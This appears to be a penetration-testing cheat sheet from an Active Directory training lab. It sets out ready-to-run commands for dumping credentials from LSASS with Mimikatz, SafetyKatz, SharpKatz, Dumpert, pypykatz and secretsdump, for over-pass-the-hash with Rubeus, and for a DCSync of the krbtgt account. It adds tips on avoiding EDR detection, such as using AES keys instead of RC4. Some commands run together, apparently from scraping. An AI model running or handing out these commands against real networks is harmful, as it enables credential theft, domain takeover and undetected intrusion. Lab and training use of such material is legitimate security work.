Invoke-Mimikatz
DO NOT TOUCH THE LSASS UNLESS YOU'RE DESPERATE.
JUST REQUIRING A HANDLE ON IT ALERTS ANY EDR
Search for credentials in credential vaults, browsers, LSA registry keys, the SAM hive.
Dumping Creds From the LSASS
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' SafetyKatz.exe "sekurlsa::ekeys"
SharpKatz.exe --Command ekeysrundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dumppypykatz.exe live lsaimpacket-secretsdump Admin:[email protected]OverPass-The-Hash
PTH we target local accounts on the machine using their NTLM hash (Testing local Admin hashes against other machines).
OPTH request a ticket from the Domain Controller using the NTLM hash or AES key. This allows us to access Domain joined resources.
Always use AES keys instead of RC4 keys (ntlm) to avoid flagging. It will get detected as an encryption downgrade
Over Pass the hash (OPTH) generates tokens from hashes or keys. Needs elevation.
The following start a PowerShell session with a logon type 9 (same as runas /netonly).
This means when you access local resources on the machine it'll still show as your original user (example whoami = student1). However when you access resources on other domain machines it will use the credentials in OPTH ticket.
Invoke-Mimikatz -Command '"sekurlsa::pth
/user:Administrator /domain:dollarcorp.moneycorp.local
/aes256:<aes256key> /run:powershell.exe"'SafetyKatz.exe "sekurlsa::pth /user:administrator
/domain: dollarcorp.moneycorp.local /aes256:<aes256keys>
/run:cmd.exe" "exit" Don't need elevation to just get the ticket
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash>
/pttThis needs elevation because you're spawning a new process.
Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec
/createnetonly:C:\Windows\System32\cmd.exe /show /pttDCSync
Extracts credentials from the DC without code execution on it
Domain Admin / Special permissions are required.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"Last updated